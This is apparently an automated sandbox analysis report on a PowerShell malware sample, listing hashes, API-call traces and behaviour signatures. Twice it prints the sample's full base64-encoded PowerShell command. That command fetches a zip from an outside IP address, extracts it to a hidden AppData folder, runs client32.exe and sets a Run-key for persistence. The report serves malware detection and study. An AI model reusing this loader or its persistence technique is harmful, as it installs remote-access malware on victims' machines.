Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 12, 2023, 9:16 a.m.	May 12, 2023, 9:19 a.m.

Size	2.2KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`b1a7bf990d3edf74025d84a61c2ecbbb`
SHA256	`92e9fae94c1d99f220db2b8d867ebb0c9fb8836bbf6d476aaa3672f850da1179`
CRC32	`B2B8672C`
ssdeep	`48:gGlFWuJqs9HZNjd+SfprcKyK0hQeJYS1FtfsC5P3RX5ZmpiaoIhSNtM:gGlFW87jd+SfpbaLJYS1FtfsC5P39Wzb`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\upl.ps1
2572
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAMwAuADQAMwAuADkANgAvAG0AYQBpAG4ALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABPAE4ARQBOADAAVABFAHUAcABkAGEAdABlAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAE8ATgBFAE4AMABUAEUAdQBwAGQAYQB0AGUAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
  2688

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 12, 2023, 9:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:16 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:16 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 12, 2023, 9:16 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW May 12, 2023, 9:16 a.m.	buffer: Processing -WindowStyle 'hid' failed: Cannot convert value "hid" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ac08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ac08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ac08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ac08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:16 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ac08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 12, 2023, 9:16 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (24 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2572 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02779000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02742000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02bb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02743000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02744000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02745000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:16 a.m.	process_identifier: 2688 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02746000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAMwAuADQAMwAuADkANgAvAG0AYQBpAG4ALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABPAE4ARQBOADAAVABFAHUAcABkAGEAdABlAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAE8ATgBFAE4AMABUAEUAdQBwAGQAYQB0AGUAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 12, 2023, 9:16 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

Creates a suspicious Powershell process (2 events)

option	-ep bypass				value	Attempts to bypass execution policy
option	-nop				value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

upl.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All